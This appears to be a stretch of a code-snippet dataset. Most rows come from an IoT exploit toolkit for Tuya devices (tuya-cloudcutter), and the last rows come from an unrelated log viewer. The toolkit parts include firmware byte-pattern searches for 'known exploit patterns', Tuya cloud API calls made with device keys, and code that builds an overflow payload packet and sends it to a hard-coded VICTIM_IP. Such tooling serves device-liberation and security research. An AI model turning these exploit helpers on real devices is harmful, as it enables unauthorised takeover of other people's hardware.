os.rename(os.path.join(extractfolder, file), os.path.join(extractfolder, file.replace('app_pattern_scan.bin', 'app_1.00.bin')))
elif file.endswith('app_pattern_scan_decrypted.bin'):
os.rename(os.path.join(extractfolder, file), os.path.join(extractfolder, file.replace('app_pattern_scan_decrypted.bin', 'app_1.00_decrypted.bin')))
issue = load_file("issue.txt")
if issue is not None:
with open(os.path.join(extractfolder, foldername + "_issue.txt"), 'w') as issueFile:
issueFile.write(issue)
image = load_file("image.jpg")
if image is not None:
with open(os.path.join(extractfolder, foldername + "_image.jpg"), 'wb') as imageFile:
imageFile.write(image)
schemaId = load_file("schema_id.txt")
if schemaId is not None:
with open(os.path.join(extractfolder, foldername + "_schema_id.txt"), 'w') as schemaIdFile:
schemaIdFile.write(schemaId)
schema = load_file("schema.txt")
if schema is not None:
with open(os.path.join(extractfolder, foldername + "_schema.txt"), 'w') as schemaFile:
schemaFile.write(schema)
storage = load_file("storage.json")
if storage is not None:
with open(os.path.join(extractfolder, foldername + "_storage.json"), 'w') as storageFile:
storageFile.write(storage)
user_param_key = load_file("user_param_key.json")
if user_param_key is not None:
with open(os.path.join(extractfolder, foldername + "_user_param_key.json"), 'w') as userParamKeyFile:
userParamKeyFile.write(user_param_key)
else:
print('[+] Encrypted bin has already been extracted')
return | null |
188,513 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def print_help():
print('Usage: python check_upgrade.py --input <uuid> <auth_key> <dev_id> <sec_key> <token>')
print(' or: python check_upgrade.py --directory <directory> <token>')
sys.exit(1) | null |
188,514 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, dev_id: str, sec_key: str, token: str = None):
if uuid is None or len(uuid) != 16:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if dev_id is None or len(dev_id) != 22:
print_and_exit('required dev_id was not found or was invalid (expected 22 characters)')
if sec_key is None or len(sec_key) != 16:
print_and_exit('required sec_key was not found or was invalid (expected 16 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregan Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} uuid: {uuid} sec_key: {sec_key}')
# tuya.device.upgrade.get encrypts with sec_key
connection = TuyaAPIConnection(uuid, sec_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, dev_id)
response = None
requestType = "POST"
data = build_data(epoch_time)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
if response.get('result') is not None:
version = response['result']['version']
url = response['result']['url']
print("[+] Firmware update available:")
print(f"[+] Version: {version}")
print(f"[+] Url: {url}")
with open(os.path.join(directory, output_file_prefix + f"_firmware_{version}.txt"), 'w') as f:
f.write(url)
else:
print("[+] No firmware update available.")
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_input(uuid, auth_key, dev_id, sec_key, token=None):
run('.\\', 'device', uuid, auth_key, dev_id, sec_key, token) | null |
188,515 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def read_single_line_file(path):
with open(path, 'r') as file:
fileContents = file.read()
if fileContents.__contains__('\n'):
return None
return fileContents
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, dev_id: str, sec_key: str, token: str = None):
if uuid is None or len(uuid) != 16:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if dev_id is None or len(dev_id) != 22:
print_and_exit('required dev_id was not found or was invalid (expected 22 characters)')
if sec_key is None or len(sec_key) != 16:
print_and_exit('required sec_key was not found or was invalid (expected 16 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregan Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} uuid: {uuid} sec_key: {sec_key}')
# tuya.device.upgrade.get encrypts with sec_key
connection = TuyaAPIConnection(uuid, sec_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, dev_id)
response = None
requestType = "POST"
data = build_data(epoch_time)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
if response.get('result') is not None:
version = response['result']['version']
url = response['result']['url']
print("[+] Firmware update available:")
print(f"[+] Version: {version}")
print(f"[+] Url: {url}")
with open(os.path.join(directory, output_file_prefix + f"_firmware_{version}.txt"), 'w') as f:
f.write(url)
else:
print("[+] No firmware update available.")
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_directory(directory, token=None):
uuid = None
auth_key = None
dev_id = None
sec_key = None
output_file_prefix = None
dirListing = os.listdir(f'{directory}')
for file in dirListing:
if file.endswith('_uuid.txt'):
uuid = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_auth_key.txt'):
auth_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_dev_id.txt'):
dev_id = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_sec_key.txt'):
sec_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_chip.txt'):
output_file_prefix = file.replace('_chip.txt', '')
if uuid is None:
print('[!] uuid was not found')
return
if auth_key is None:
print('[!] auth_key was not found')
return
if dev_id is None:
print('[!] dev_id was not found')
return
if sec_key is None:
print('[!] sec_key was not found')
return
run(directory, output_file_prefix, uuid, auth_key, dev_id, sec_key, token) | null |
188,516 | import json
import os
import os.path
import sys
full_path: str
base_name: str
def assemble():
if os.path.exists(full_path) == False:
print("[!] Unable to find device directory name")
return
# All should have these
manufacturer = base_name.split('_')[0].replace('-', ' ').replace(" ", "-")
name = base_name.split('_')[1].replace('-', ' ').replace(" ", "-")
device_class = load_file("device_class.txt")
chip = load_file("chip.txt")
sdk = load_file("sdk.txt")
bv = load_file("bv.txt")
# uuid = load_file("uuid.txt")
ap_ssid = load_file("ap_ssid.txt")
# auth_key = load_file("auth_key.txt")
address_finish = load_file("address_finish.txt")
icon = load_file("icon.txt")
if address_finish is None:
print("[!] Directory has not been fully processed, unable to generate classic profile")
return
# Optional items
swv = load_file("swv.txt")
if swv is None:
swv = "0.0.0"
product_key = load_file("product_key.txt")
firmware_key = load_file("firmware_key.txt")
address_datagram = load_file("address_datagram.txt")
address_ssid = load_file("address_ssid.txt")
address_ssid_padding = load_file("address_ssid_padding.txt")
address_passwd = load_file("address_passwd.txt")
schema_id = load_file("schema_id.txt")
schema = load_file("schema.txt")
if schema is not None and schema != '':
schema = json.loads(schema)
issue = load_file("issue.txt")
image = load_file("image.jpg")
device_configuration = load_file("user_param_key.json")
profile = {}
firmware = {}
data = {}
profile["name"] = f"{swv} - {chip}"
profile["sub_name"] = device_class
profile["type"] = "CLASSIC"
profile["icon"] = icon
firmware["chip"] = chip
firmware["name"] = device_class
firmware["version"] = swv
firmware["sdk"] = f"{sdk}-{bv}"
if firmware_key is not None:
firmware["key"] = firmware_key
profile["firmware"] = firmware
data["address_finish"] = address_finish
if address_datagram is not None:
data["address_datagram"] = address_datagram
if address_ssid is not None:
data["address_ssid"] = address_ssid
if address_ssid_padding is not None:
data["address_ssid_padding"] = int(address_ssid_padding)
if address_passwd is not None:
data["address_passwd"] = address_passwd
profile["data"] = data
if not os.path.exists(os.path.join(full_path, "profile-classic")):
os.makedirs(os.path.join(full_path, "profile-classic"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "devices")):
os.makedirs(os.path.join(full_path, "profile-classic", "devices"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "images")):
os.makedirs(os.path.join(full_path, "profile-classic", "images"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "profiles")):
os.makedirs(os.path.join(full_path, "profile-classic", "profiles"))
classic_profile_name = f"{device_class.replace('_', '-')}-{swv}-sdk-{sdk}-{bv}".lower()
print(f"[+] Creating classic profile {classic_profile_name}")
with open(os.path.join(full_path, "profile-classic", "profiles", f"{classic_profile_name}.json"), 'w') as f:
f.write(json.dumps(profile, indent='\t'))
f.write('\n')
device = {}
device["manufacturer"] = manufacturer
device["name"] = name
device_filename = f"{manufacturer.replace(' ', '-')}-{name.replace(' ', '-')}".lower()
# this won't be used in exploiting, bit it is useful to have a known one
# in case we need to regenerate schemas from Tuya's API
# device["uuid"] = uuid
# device["auth_key"] = auth_key
if product_key is not None:
device["key"] = product_key
device["ap_ssid"] = ap_ssid
device["github_issues"] = []
if issue is not None:
device["github_issues"].append(int(issue))
device["image_urls"] = []
if image is not None:
device["image_urls"].append(device_filename + ".jpg")
device["profiles"] = [classic_profile_name]
if schema_id is not None and schema is not None:
schema_dict = {}
schema_dict[f"{schema_id}"] = schema
device["schemas"] = schema_dict
else:
print("[!] Schema is not present, unable to generate classic device file")
return
if device_configuration is not None:
device["device_configuration"] = json.loads(device_configuration)
print(f"[+] Creating device profile {device_filename}")
with open(os.path.join(full_path, "profile-classic", "devices", f"{device_filename}.json"), 'w') as f:
f.write(json.dumps(device, indent='\t'))
f.write('\n')
if image is not None:
with open(os.path.join(full_path, "profile-classic", "images", f"{device_filename}.jpg"), 'wb') as f:
f.write(image)
def run(processed_directory: str):
global full_path, base_name
full_path = processed_directory
base_name = os.path.basename(os.path.normpath(full_path))
assemble()
return | null |
188,517 | import os.path
import sys
def walk_app_code():
print(f"[+] Searching for known exploit patterns")
if b'TUYA' not in appcode:
raise RuntimeError('[!] App binary does not appear to be correctly decrypted, or has no Tuya references.')
# Older versions of BK7231T, BS version 30.04, SDK 2.0.0
if b'TUYA IOT SDK V:2.0.0 BS:30.04' in appcode and b'AT 8710_2M' in appcode:
# 04 1e 2c d1 11 9b is the byte pattern for datagram payload
# 3 matches, 2nd is correct
# 2b 68 30 1c 98 47 is the byte pattern for finish addess
# 1 match should be found
process_generic("BK7231T", "SDK 2.0.0 8710_2M", "datagram", 0, "041e2cd1119b", 1, 0, "2b68301c9847", 1, 0)
return
# Older versions of BK7231T, BS version 30.05/30.06, SDK 2.0.0
if (b'TUYA IOT SDK V:2.0.0 BS:30.05' in appcode or b'TUYA IOT SDK V:2.0.0 BS:30.06' in appcode) and b'AT 8710_2M' in appcode:
# 04 1e 07 d1 11 9b 21 1c 00 is the byte pattern for datagram payload
# 3 matches, 2nd is correct
# 2b 68 30 1c 98 47 is the byte pattern for finish addess
# 1 match should be found
process_generic("BK7231T", "SDK 2.0.0 8710_2M", "datagram", 0, "041e07d1119b211c00", 3, 1, "2b68301c9847", 1, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 1.0.x, nobt
if b'TUYA IOT SDK V:1.0.' in appcode and b'AT bk7231t_nobt' in appcode:
# b5 4f 06 1e 07 d1 is the byte pattern for datagram payload
# 1 match should be found
# 23 68 38 1c 98 47 is the byte pattern for finish addess
# 2 matches should be found, 1st is correct
process_generic("BK7231T", "SDK 1.0.# nobt", "datagram", 0, "b54f061e07d1", 1, 0, "2368381c9847", 2, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 1.0.x
if b'TUYA IOT SDK V:1.0.' in appcode and b'AT bk7231t' in appcode:
# a1 4f 06 1e is the byte pattern for datagram payload
# 1 match should be found
# 23 68 38 1c 98 47 is the byte pattern for finish addess
# 2 matches should be found, 1st is correct
process_generic("BK7231T", "SDK 1.0.#", "datagram", 0, "a14f061e", 1, 0, "2368381c9847", 2, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 2.3.0
if b'TUYA IOT SDK V:2.3.0' in appcode and b'AT bk7231t' in appcode:
# 04 1e 08 d1 4d 4b is the byte pattern for datagram payload
# 1 match should be found
# 7b 69 20 1c 98 47 is the byte pattern for finish addess
# 1 match should be found, 1st is correct
# Padding offset of 20 is the only one available in this SDK, instead of the usual 4 for SSID.
process_generic("BK7231T", "SDK 2.3.0", "ssid", 20, "041e08d14d4b", 1, 0, "7b69201c9847", 1, 0)
return
# Newest versions of BK7231T, BS 40.00, SDK 2.3.2
if b'TUYA IOT SDK V:2.3.2 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.4_CD:1.0.0' in appcode:
# 04 1e 00 d1 0c e7 is the byte pattern for ssid payload (offset 8 bytes)
# 1 match should be found
# bb 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found, 1st is correct
# Padding offset of 8 is the only one available in this SDK, instead of the usual 4 for SSID.
process_generic("BK7231T", "SDK 2.3.2", "ssid", 8, "041e00d10ce7", 1, 0, "bb68201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.1, CAD 1.0.3
# 0.0.2 is also a variant of 2.3.1
if (b'TUYA IOT SDK V:2.3.1 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:0.0.2 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:2.3.1 BS:40.00_PT:2.2_LAN:3.4_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:ffcgroup BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode):
# 05 1e 00 d1 15 e7 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.1", "ssid", 4, "051e00d115e7", 1, 0, "4368201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.3, CAD 1.0.4
if b'TUYA IOT SDK V:2.3.3 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.4_CD:1.0.0' in appcode:
# 05 1e 00 d1 13 e7 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.3 LAN 3.3/CAD 1.0.4", "ssid", 4, "051e00d113e7", 1, 0, "4368201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.3, CAD 1.0.5
if b'TUYA IOT SDK V:2.3.3 BS:40.00_PT:2.2_LAN:3.4_CAD:1.0.5_CD:1.0.0' in appcode:
# 05 1e 00 d1 fc e6 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.3 LAN 3.4/CAD 1.0.5", "ssid", 4, "051e00d1fce6", 1, 0, "4368201c9847", 1, 0)
return
# TuyaOS V3+, patched
if b'TuyaOS V:3' in appcode:
print("[!] The binary supplied appears to be patched and no longer vulnerable to the tuya-cloudcutter exploit.")
sys.exit(5)
raise RuntimeError('Unknown pattern, please open a new issue and include the bin.')
def run(decrypted_app_file: str):
if not decrypted_app_file:
print('Usage: python haxomatic.py <app code file>')
sys.exit(1)
address_finish_file = decrypted_app_file.replace('_app_1.00_decrypted.bin', '_address_finish.txt')
if os.path.exists(address_finish_file):
print('[+] Haxomatic has already been run')
return
global appcode_path, appcode
appcode_path = decrypted_app_file
with open(appcode_path, 'rb') as fs:
appcode = fs.read()
walk_app_code() | null |
188,518 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def print_help():
print('Usage: python pull_schema.py --input <uuid> <auth_key> <product_key or empty string ""> <firmware_key or empty string ""> <software_version> <baseline_version> <token>')
print(' or: python pull_schema.py --directory <directory> <token>')
sys.exit(1) | null |
188,519 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, product_key: str, firmware_key: str, software_version: str, baseline_version: str = '40.00', cad_version: str = '1.0.2', cd_version: str = '1.0.0', protocol_version='2.2', token: str = None):
def run_input(uuid, auth_key, product_key, firmware_key, software_version, baseline_version='40.00', cad_version='1.0.2', cd_version='1.0.0', protocol_version='2.2', token=None):
run('.\\', 'device', uuid, auth_key, product_key, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, token) | null |
188,520 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def read_single_line_file(path):
with open(path, 'r') as file:
fileContents = file.read()
if fileContents.__contains__('\n'):
return None
return fileContents
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, product_key: str, firmware_key: str, software_version: str, baseline_version: str = '40.00', cad_version: str = '1.0.2', cd_version: str = '1.0.0', protocol_version='2.2', token: str = None):
if uuid is None or len(uuid) != 16:
if product_key is not None and len(product_key) == 16:
uuid = product_key
else:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if (product_key is None or len(product_key) == 0) and (firmware_key is None or len(firmware_key) == 0):
print_and_exit('required product_key or firmware_key was not found or was invalid (expected 16 characters)')
if software_version is None or len(software_version) < 5:
print_and_exit('required softVer was not found or was invalid (expected >= 5 characters)')
if cad_version is None or len(cad_version) < 5:
print_and_exit('required cadVer was not found or was invalid (expected >= 5 characters)')
if baseline_version is None or len(baseline_version) < 5:
print_and_exit('required baselineVer was not found or was invalid (expected 5 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregan Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} product_key: {product_key} firmware_key: {firmware_key}')
# tuya.device.active encrypts with auth_key
connection = TuyaAPIConnection(uuid, auth_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, uuid)
response = None
requestType = "POST"
responseCodesToContinueAter = ['FIRMWARE_NOT_MATCH', 'APP_PRODUCT_UNSUPPORT', 'NOT_EXISTS']
if product_key is not None:
data = build_data(epoch_time, reduced_token, product_key, software_version, baseline_version, cad_version, cd_version, protocol_version, False)
response = connection.request(url, params, data, requestType)
if response["success"] == False and response["errorCode"] in responseCodesToContinueAter:
data = build_data(epoch_time, reduced_token, product_key, software_version, baseline_version, cad_version, cd_version, protocol_version, True)
response = connection.request(url, params, data, requestType)
if product_key != firmware_key:
if (response is None or (response is not None and response["success"] == False and response["errorCode"] != "EXPIRE")) and firmware_key is not None:
data = build_data(epoch_time, reduced_token, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, True)
response = connection.request(url, params, data, requestType)
if response["success"] == False and response["errorCode"] in responseCodesToContinueAter:
data = build_data(epoch_time, reduced_token, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, False)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
print(f"[+] Schema Id: {response['result']['schemaId']}")
print(f"[+] Schema: {response['result']['schema']}")
with open(os.path.join(directory, output_file_prefix + "_schema_id.txt"), 'w') as f:
f.write(response['result']['schemaId'])
with open(os.path.join(directory, output_file_prefix + "_schema.txt"), 'w') as f:
f.write(response['result']['schema'])
with open(os.path.join(directory, output_file_prefix + "_dev_id.txt"), 'w') as f:
f.write(response['result']['devId'])
with open(os.path.join(directory, output_file_prefix + "_sec_key.txt"), 'w') as f:
f.write(response['result']['secKey'])
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_directory(directory, token=None):
uuid = None
auth_key = None
product_key = None
firmware_key = None
software_version = None
baseline_version = '40.00'
cad_version = '1.0.2'
cd_version = '1.0.0'
protocol_version = '2.2'
output_file_prefix = None
dirListing = os.listdir(f'{directory}')
for file in dirListing:
if file.endswith('_uuid.txt'):
uuid = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_auth_key.txt'):
auth_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_product_key.txt'):
product_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_firmware_key.txt'):
firmware_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_swv.txt'):
software_version = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_bv.txt'):
baseline_version = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_chip.txt'):
output_file_prefix = file.replace('_chip.txt', '')
if uuid is None:
print('[!] uuid was not found')
return
if auth_key is None:
print('[!] auth_key was not found')
return
if (product_key is None or product_key == '') and (firmware_key is None or firmware_key == ''):
print('[!] product_key or firmware_key was not found, at least one must be provided')
return
if software_version is None:
print('[!] software_version was not found')
return
if baseline_version is None:
print('[!] baseline_version was not found')
return
run(directory, output_file_prefix, uuid, auth_key, product_key, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, token) | null |
188,521 | import os.path
import sys
import extract
import generate_profile_classic
import haxomatic
import process_app
import process_storage
import pull_schema
def print_filename_instructions():
print('Encrypted bin name must be in the pattern of Manufacturer-Name_Model-and-device-description')
print('Use dashes in places of spaces, and if a dash (-) is present, replace it with 3 dashes (---)')
print('There should only be 1 underscore in the filename, separating manufacturer name and model description') | null |
188,522 | import struct
import zlib
import socket
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8
def build_network_config_packet(payload):
if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
raise ValueError('Payload is too long!')
# NOTE
# fr_num and crc do not seem to be used in the disas
# calculating them anyway - in case it's needed
# for some reason.
tail_len = 8
head, tail = 0x55aa, 0xaa55
fr_num, fr_type = 0, 0x1
plen = len(payload) + tail_len
buffer = struct.pack("!IIII", head, fr_num, fr_type, plen)
buffer += payload
crc = zlib.crc32(buffer)
buffer += struct.pack("!II", crc, tail)
return buffer | null |
188,523 | import struct
import zlib
import socket
VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669
def send_network_config_datagram(datagram):
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(datagram, (VICTIM_IP, VICTIM_PORT)) | null |
188,524 | import struct
import zlib
import socket
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded) | null |
188,525 | import struct
import zlib
import socket
def check_valid_payload(value):
eq_zero = lambda x: x == 0
if any(map(eq_zero, value)):
print('[!] At least one null byte detected in payload. Clobbering will stop before that.')
return value | null |
188,526 | from __future__ import annotations
import rich.repr
from abc import ABC, abstractmethod
from dataclasses import dataclass
import platform
from threading import Event, Lock, Thread
from typing import Callable, TYPE_CHECKING
class WatcherBase(ABC):
"""Watches files for changes."""
def __init__(self) -> None:
self._file_descriptors: dict[int, WatchedFile] = {}
self._thread: Thread | None = None
self._exit_event = Event()
super().__init__()
def scan_chunk(cls, chunk: bytes, position: int) -> list[int]:
"""Scan line breaks in a binary chunk,
Args:
chunk: A binary chunk.
position: Offset within the file
Returns:
A list of indices with new lines.
"""
breaks: list[int] = []
offset = 0
append = breaks.append
while (offset := chunk.find(b"\n", offset)) != -1:
append(position + offset)
offset += 1
return breaks
def close(self) -> None:
if not self._exit_event.is_set():
self._exit_event.set()
self._thread = None
def start(self) -> None:
assert self._thread is None
self._thread = Thread(target=self.run, name=repr(self))
self._thread.start()
def add(
self,
log_file: LogFile,
callback: Callable[[int, list[int]], None],
error_callback: Callable[[Exception], None],
) -> None:
"""Add a file to the watcher."""
fileno = log_file.fileno
self._file_descriptors[fileno] = WatchedFile(log_file, callback, error_callback)
def run(self) -> None:
"""Thread runner."""
class SelectorWatcher(WatcherBase):
"""Watches files for changes."""
def __init__(self) -> None:
self._selector = DefaultSelector()
super().__init__()
def close(self) -> None:
if not self._exit_event.is_set():
self._exit_event.set()
def add(
self,
log_file: LogFile,
callback: Callable[[int, list[int]], None],
error_callback: Callable[[Exception], None],
) -> None:
"""Add a file to the watcher."""
super().add(log_file, callback, error_callback)
fileno = log_file.fileno
size = log_file.size
os.lseek(fileno, size, os.SEEK_SET)
self._selector.register(fileno, EVENT_READ)
def run(self) -> None:
"""Thread runner."""
chunk_size = 64 * 1024
scan_chunk = self.scan_chunk
while not self._exit_event.is_set():
for key, mask in self._selector.select(timeout=0.1):
if self._exit_event.is_set():
break
if mask & EVENT_READ:
fileno = key.fileobj
assert isinstance(fileno, int)
watched_file = self._file_descriptors.get(fileno, None)
if watched_file is None:
continue
try:
position = os.lseek(fileno, 0, os.SEEK_CUR)
chunk = os.read(fileno, chunk_size)
if chunk:
breaks = scan_chunk(chunk, position)
watched_file.callback(position + len(chunk), breaks)
except Exception as error:
watched_file.error_callback(error)
self._file_descriptors.pop(fileno, None)
self._selector.unregister(fileno)
class PollWatcher(WatcherBase):
"""A watcher that simply polls."""
def run(self) -> None:
chunk_size = 64 * 1024
scan_chunk = self.scan_chunk
while not self._exit_event.is_set():
successful_read = False
for fileno, watched_file in self._file_descriptors.items():
try:
position = lseek(fileno, 0, SEEK_CUR)
if chunk := read(fileno, chunk_size):
successful_read = True
breaks = scan_chunk(chunk, position)
watched_file.callback(position + len(chunk), breaks)
position += len(chunk)
except Exception as error:
watched_file.error_callback(error)
self._file_descriptors.pop(fileno, None)
break
else:
if not successful_read:
time.sleep(0.05)
The provided code snippet includes necessary dependencies for implementing the `get_watcher` function. Write a Python function `def get_watcher() -> WatcherBase` to solve the following problem:
Return an Watcher appropriate for the OS.
Here is the function:
def get_watcher() -> WatcherBase:
"""Return an Watcher appropriate for the OS."""
if platform.system() == "Darwin":
from toolong.selector_watcher import SelectorWatcher
return SelectorWatcher()
else:
from toolong.poll_watcher import PollWatcher
return PollWatcher() | Return an Watcher appropriate for the OS. |
188,527 | from rich.highlighter import RegexHighlighter
from rich.text import Text
The provided code snippet includes necessary dependencies for implementing the `_combine_regex` function. Write a Python function `def _combine_regex(*regexes: str) -> str` to solve the following problem:
Combine a number of regexes in to a single regex. Returns: str: New regex with all regexes ORed together.
Here is the function:
def _combine_regex(*regexes: str) -> str:
"""Combine a number of regexes in to a single regex.
Returns:
str: New regex with all regexes ORed together.
"""
return "|".join(regexes) | Combine a number of regexes in to a single regex. Returns: str: New regex with all regexes ORed together. |
188,528 | from __future__ import annotations
from importlib.metadata import version
import os
import sys
import click
from toolong.ui import UI
class UI(App):
"""The top level App object."""
def sort_paths(cls, paths: list[str]) -> list[str]:
return sorted(paths, key=CompareTokens)
def __init__(
self, file_paths: list[str], merge: bool = False, save_merge: str | None = None
) -> None:
self.file_paths = self.sort_paths(file_paths)
self.merge = merge
self.save_merge = save_merge
self.watcher = get_watcher()
super().__init__()
async def on_mount(self) -> None:
await self.push_screen(LogScreen())
self.screen.query("LogLines").focus()
self.watcher.start()
def on_unmount(self) -> None:
self.watcher.close()
The provided code snippet includes necessary dependencies for implementing the `run` function. Write a Python function `def run(files: list[str], merge: bool, output_merge: str) -> None` to solve the following problem:
View / tail / search log files.
Here is the function:
def run(files: list[str], merge: bool, output_merge: str) -> None:
"""View / tail / search log files."""
stdin_tty = sys.__stdin__.isatty()
if not files and stdin_tty:
ctx = click.get_current_context()
click.echo(ctx.get_help())
ctx.exit()
if stdin_tty:
try:
ui = UI(files, merge=merge, save_merge=output_merge)
ui.run()
except Exception:
pass
else:
import signal
import selectors
import subprocess
import tempfile
def request_exit(*args) -> None:
"""Don't write anything when a signal forces an error."""
sys.stderr.write("^C")
signal.signal(signal.SIGINT, request_exit)
signal.signal(signal.SIGTERM, request_exit)
# Write piped data to a temporary file
with tempfile.NamedTemporaryFile(
mode="w+b", buffering=0, prefix="tl_"
) as temp_file:
# Get input directly from /dev/tty to free up stdin
with open("/dev/tty", "rb", buffering=0) as tty_stdin:
# Launch a new process to render the UI
with subprocess.Popen(
[sys.argv[0], temp_file.name],
stdin=tty_stdin,
close_fds=True,
